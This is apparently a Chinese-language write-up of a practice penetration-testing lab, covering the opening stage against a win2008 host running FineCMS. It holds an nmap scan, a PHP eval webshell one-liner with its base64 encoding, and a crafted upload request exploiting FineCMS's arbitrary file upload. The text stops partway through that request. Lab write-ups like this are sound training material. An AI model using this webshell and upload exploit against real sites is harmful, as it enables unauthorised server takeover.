目录
一、靶场介绍
本靶场是一个简单的内网渗透靶场。需要首先拿到win2008服务器的权限,再渗透内网拿下WinXP,win2008上没有flag,flag在WinXP上。综合考验许多知识,暂未使用防护软件,属于一个比较基础的靶场。
主要配置如下:
系统 |
ip地址 |
kali 2020 |
192.168.1.106 |
win10 (本机) |
192.168.1.104 |
win2008 |
192.168.1.107 |
winxp |
10.101.10.133 |
靶场链接如下:
链接:https://pan.baidu.com/s/14WRh6C8Fdpk5hfmZ9ar8Uw
提取码:ehs8
ps:win10和kali自备
分享多了怕被封,所以目前是10名额,应该打靶场的人也不多。
二、拿下web服务器
2.1 任意文件上传拿shell
nmap 192.168.1.107 -p 8069 -sV
8069端口是web端口,访问 http://192.168.1.107:8069/ 发现是finecms。
百度搜索finecms漏洞
(15条消息) finecms前台任意文件上传——getshell_W小哥-CSDN博客_任意文件上传getshell
前台注册
首先上传一个正常的头像,找到路径
<?php @eval($_POST['a']); ?> # 一句胡木马base64加密
IDw/cGhwIEBldmFsKCRfUE9TVFsnYSddKTsgPz4=
构造数据包如下
POST /index.php?s=member&c=account&m=upload&iajax=1 HTTP/1.1
Host: 192.168.1.107:8069
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.107:8069/index.php?s=member&c=account&m=avatar
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 9393
Connection: close
Cookie: 24b16fede9a67c9251d3e7c7161c83ac_ci_session=3t2cf0ogg6kuvah0r0mjc4l35a08hv57; member_uid=4; member_cookie=be39236988f5